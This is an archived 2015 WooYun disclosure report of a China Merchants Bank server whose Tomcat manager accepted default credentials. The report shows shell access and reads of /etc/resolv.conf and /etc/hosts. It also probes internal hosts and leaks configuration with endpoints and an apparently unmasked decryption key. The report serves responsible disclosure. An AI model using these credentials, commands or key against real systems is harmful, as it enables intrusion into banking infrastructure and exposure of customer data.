WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2015-04-21: Details have been sent to the vendor and are awaiting the vendor's handling
2015-04-21: Vendor has confirmed; details are disclosed to the vendor only
2015-05-01: Details disclosed to core white hats and experts in related fields
2015-05-11: Details disclosed to regular white hats
2015-05-21: Details disclosed to intern white hats
2015-06-05: Details disclosed to the public
A China Merchants Bank server has a vulnerability that allows a shell (penetrating the perimeter firewall and reaching the internal network); since this is a banking system, I did not dare to go any deeper.
http://61.152.151.203:8001/manager/html (tomcat:tomcat)
This is a system related to China Merchants Bank's WeChat and bank-card services.
cmb/card_getCardDetail.action
cmb/card_getCardForWeixin.action
cat /etc/resolv.conf
search cmbccd.cmbchina.com
nameserver 10.48.64.6
nameserver 10.48.64.7
nameserver 10.47.1.11

cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.1.1 SCCWECHAT02101.cmbccd.cmbchina.com SCCWECHAT02101
This server is connected to the internal 10.x network:
curl http://10.48.88.56:8088
Apache Tomcat/6.0.35 - Error report
HTTP Status 404 - There is no Action mapped for namespace [/] and action name [] associated with context path [].
type Status report
message There is no Action mapped for namespace [/] and action name [] associated with context path [].
description The requested resource (There is no Action mapped for namespace [/] and action name [] associated with context path [].) is not available.
Apache Tomcat/6.0.35
#==================================#
#OAuth
#================================#
Encrypt_Key=cmb**.**
#==================================#
# cmb points red envelope
#==================================#
#== test environment ==
# activity end time
activityEndTime=2015-02-27 00:00:00
# IP of the interface to call
ip=http://10.48.**.**:8088
# get jsapi_ticket
jsapi_ticket=http://10.48.**.**:8088/repoints/repoints_getWXjsAPIticket.action
# check whether the user is bound
isBind=/repoints/repoints_isBind.action
# get total points
queryTotalPoints=/repoints/repoints_queryAvaiPoints.action
# get mobile verification code
getCaptcha=/repoints/repoints_getValidateCode.action
# create red envelope
crtRedEnvelope=/repoints/repoints_crtRedEnvelope.action
# get the grabbed red envelope and its details by red envelope id
getREDetails=/repoints/repoints_getREDetailsByREId.action
# get the grabbed red envelope and its details by red envelope id
drawRedEnvelope=/repoints/repoints_drawRedEnvelope.action
# get all red envelopes and their grabbed details by openid
getAllREPoints=/repoints/repoints_getAllREPointsByOpenid.action
# get the red envelopes grabbed and their details by openid
getDrawRedEnvelope=/repoints/repoints_getRedEnvelopeByOpenId.action
# claim red envelope
accountPoints=/repoints/repoints_accountPoints.action
#==================================#
# WeChat js-sdk
#==================================#
# random string used to generate signatures
noncestr=CMB20**.**lope
#==================================#
# private key
#==================================#
# private key
prikey=**************************************************************************uwRWV8zzjzAc4ylKvr2uY5FmUHn96Lw=
share_page_url=http://pointsbonus.cmbchina.com/bindpoints/bindPointsIndex
redirect_Url=http://www.baidu.com
decrypt_Key=cmbedcba#yaoyuan.150331
backstage_url=http://10.48.**.**:8088/bindPoints/points_shareRecord.action

<?xml version="1.0" encoding="UTF-8"?>
<root>
  <AttentionAwoke>
    <!-- resend count -->
    <sendNum>3</sendNum>
    <comefrom>161</comefrom>
    <!-- news-related configuration -->
    <title>官方微信智能语音邀您体验--随时申请调高信用额度--快速定位周边优惠商户、特价影院、招行网点、ATM--让“小招”常驻手机桌面,快速掌握您的用卡信息</title>
    <description>3秒查账单、查积分、查额度--随时申请调高信用额度--周边优惠商户、招行网点--让“小招”出现在手机桌面</description>
    <picUrl>http://market.cmbchina.com/ccard/weixin/news/20140122/640b.jpg--http://market.cmbchina.com/ccard/weixin/news/20140122/a.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/b.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/c.jpg</picUrl>
    <url>http://market.cmbchina.com/ccard/weixin/news/20140122/--http://market.cmbchina.com/ccard/weixin/news/20130916/--http://market.cmbchina.com/ccard/weixin/news/20140120_lbs/--http://market.cmbchina.com/ccard/weixin/news/20140120_kjzm/</url>
    <!-- UAT -->
  </AttentionAwoke>
  <weixingUrl>
    <!-- whether to fetch the token from the authentication server -->
    <getToken>true</getToken>
    <!-- production environment -->
    <!-- <newtoken>http://10.48.**.**:8081/system/weixin!gettoken.action</newtoken> <getToken>http://10.48.**.**:8090/cgi-bin/token</getToken> <api>http://10.48..**.**:8090/cgi-bin/</api> -->
    <!-- test environment -->
    <getToken>http://api.weixin.qq.com/cgi-bin/token</getToken>
    <api>http://api.weixin.qq.com/cgi-bin/</api>
    <newtoken>http://192.168..**.**:8781/system/weixin!gettoken.action </newtoken>
  </weixingUrl>
  <CARD>
    <page_size>10</page_size>
    <page_url>system/card_getBatchCard</page_url>
    <get_card_url>http://192.168.**.**:8027/cmb/card_getCardForWeixin.action</get_card_url>
    <card_detail_url>http://192.168.**.**:8027/cmb/card_getCardDetail.action</card_detail_url>
    <card_info_url>/jsp/card/cardInfo.jsp?wechat_card_js=1</card_info_url>
  </CARD>
</root>
This really should not be exposed on the public internet.
Severity level: High
Vulnerability Rank: 11
Confirmation time: 2015-04-21 23:16
Thank you for your attention to the security of China Merchants Bank.
None yet